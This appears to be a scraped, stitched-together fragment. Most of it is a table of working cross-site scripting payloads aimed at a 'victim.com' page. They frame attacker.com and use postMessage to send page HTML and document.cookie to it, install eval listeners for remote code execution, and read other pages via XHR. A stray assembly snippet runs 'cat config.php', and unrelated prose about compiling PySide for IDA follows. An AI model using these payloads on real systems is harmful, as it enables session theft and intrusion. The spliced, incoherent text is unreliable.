| http://victim.com/vulnerable.php?string=<iframe src="http://attacker.com/"></iframe><script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script> |
| http://victim.com/vulnerable.php?string=<iframe src="http://attacker.com/" id="someframe"></iframe><script>document.getElementById('someframe').contentWindow.postMessage(document.body.innerHTML, '*')</script> |
| http://victim.com/vulnerable.php?string=<script>window.top.postMessage(document.body.innerHTML, '*')</script> |
| http://victim.com/vulnerable.php?string=<script>window.top.postMessage(function() {var x=new XMLHttpRequest();x.open('GET','/other/page.html',false);x.send();return x.responseText}(), '*')</script> |
| <script> | |
| var w = window.open("http://www.victim.com/vulnerable.php?string=<script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>", "somewindow"); | |
| w.postMessage("window.opener.postMessage(document.body.innerHTML, '*')", "*"); | |
| </script> |
| <script> | |
| window.addEventListener( | |
| 'message', | |
| function(e) { | |
| window.top.postMessage( | |
| function() {var x=new XMLHttpRequest();x.open('GET',e.data,false);x.send();return x.responseText}(), '*' | |
| ) | |
| }, | |
| false); | |
| </script> |
| <script> | |
| window.top.postMessage(document.cookie, '*'); | |
| </script> |
| <script> | |
| window.addEventListener('message', function(e) {eval(e.data)}, false); | |
| </script> |
| section .data | |
| cmd: | |
| db "cat config.php", 10 | |
| section .text | |
| global _start | |
| extern system | |
| _start: | |
| push cmd |
If you've ever wanted to use IDA's native GUIs, you'll need PySide. Unfortunately PySide is annoying to compile, and the only available binaries are for Python 2.6. This should work for any version.
Note: The python module installer executable at the end of this guide did not work for me. The compiled pyd and dll files, however were completely usable from within IDA.
